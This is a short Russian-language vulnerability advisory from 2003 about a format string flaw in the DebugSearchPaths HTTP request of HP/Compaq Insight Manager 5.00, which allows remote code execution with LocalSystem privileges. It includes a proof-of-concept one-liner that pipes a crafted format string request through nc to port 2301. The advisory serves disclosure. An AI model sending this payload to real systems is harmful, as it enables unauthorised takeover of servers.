Удаленное выполнение произвольного кода в HP/Compaq Insight Manager
| Дата публикации: | 06.08.2003 |
| Всего просмотров: | 1128 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в HP/Compaq Insight Manager. Удаленный пользователь может выполнить произвольный код на системе.
Уязвимость форматной строки обнаружена в DebugSearchPaths HTTP запросе. Удаленный атакующий может выполнить произвольный код с LocalSystem привилегиями. Пример: $ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301 Уязвимость обнаружена в Compaq Insight Manager 5.00 H Способов устранения обнаруженной уязвимости не существует в настоящее время. |
| Ссылки: | formatstring bug in Compaq HTTP Servers |